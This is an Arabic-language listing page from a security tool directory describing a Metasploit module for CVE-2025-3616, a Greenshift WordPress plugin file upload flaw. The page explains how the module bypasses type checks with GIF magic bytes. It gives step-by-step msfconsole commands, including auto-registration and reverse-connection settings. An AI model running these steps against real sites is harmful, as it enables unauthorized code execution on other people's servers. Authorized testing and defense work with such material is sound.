Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3616 — وحدة Metasploit تستغل ثغرة CVE-2025-3616، وهي رفع ملفات عشوائي في إضافة Greenshift لـ WordPress، مما يتيح للمستخدمين المصادق عليهم تنفيذ تعليمات برمجية عن بعد (RCE) عبر تزوير نوع MIME باستخدام بايتات GIF السحرية. | Kitploit
أدوات/GitHubGitHub/b4d-53ct0r/cve-2025-3616
أطر الاستغلالتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالمصادقةتطوير الحمولات
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

وحدة Metasploit تستغل ثغرة CVE-2025-3616، وهي رفع ملفات عشوائي في إضافة Greenshift لـ WordPress، مما يتيح للمستخدمين المصادق عليهم تنفيذ تعليمات برمجية عن بعد (RCE) عبر تزوير نوع MIME باستخدام بايتات GIF السحرية.

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

وحدة Metasploit: تحميل ملف عشوائي في إضافة Greenshift لووردبريس (CVE-2025-3616)

يحتوي هذا المستودع على وحدة Metasploit لاستغلال CVE-2025-3616، وهي ثغرة تحميل ملف عشوائي في إضافة Greenshift لووردبريس (الإصدارات 11.4 حتى 11.4.5).

تسمح هذه الثغرة للمستخدمين الموثقين (مشترك فما فوق) بتحميل ملفات عشوائية تؤدي إلى تنفيذ أكواد عن بعد (RCE). وهي تتجاوز التحقق من نوع الملف في الإضافة عن طريق تزوير نوع MIME باستخدام بايتات سحرية لـ GIF (GIF89a;).

الميزات

  • معالجة المصادقة: يدعم تسجيل الدخول ببيانات اعتماد موجودة (USERNAME/PASSWORD).
  • التسجيل التلقائي: يتضمن خيار REGISTER لتسجيل مستخدم جديد تلقائيًا واستغلال الثغرة باستخدام ملفات تعريف الارتباط للجلسة الجديدة (مفيد إذا كان التسجيل ممكّنًا على الهدف).
  • استخراج Nonce: يقوم تلقائيًا باستخراج Nonce المطلوب wp_rest من لوحة التحكم الإدارية.
  • تجاوز الأمان: يسبق الحمولة PHP ببايتات سحرية لـ GIF لتجاوز التحقق finfo_file().

التثبيت

  1. تأكد من تثبيت إطار عمل Metasploit.

  2. انسخ wp_greenshift_file_upload.rb إلى دليل الوحدات المحلي لديك:

    root@kitploit:~
    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. ابدأ msfconsole وأعد تحميل الوحدات:

    root@kitploit:~
    msfconsole
    msf6 > reload_all
    

الاستخدام

1. استخدام التسجيل التلقائي (موصى به)

إذا كان التسجيل ممكّنًا على الهدف، فلن تحتاج إلى بيانات اعتماد.

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. استخدام بيانات الاعتماد الموجودة

إذا كان لديك بالفعل مستخدم صالح (مشترك أو أعلى):

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

الخيارات

إخلاء مسؤولية

هذه الوحدة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدام هذا الكود لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني.

تنزيل الأداة
الخيارمطلوبالوصف
RHOSTSنعمعنوان الهدف
LHOSTنعمعنوان الاستماع (عنوان IP الخاص بك)
REGISTERلااضبطه على true لتسجيل حساب جديد تلقائيًا (الافتراضي: false)
USERNAMEلااسم مستخدم ووردبريس (مطلوب إذا كان REGISTER خطأ)
PASSWORDلاكلمة مرور ووردبريس (مطلوب إذا كان REGISTER خطأ)
EMAILلاالبريد الإلكتروني للتسجيل (اختياري، يتم إنشاؤه تلقائيًا إذا كان فارغًا)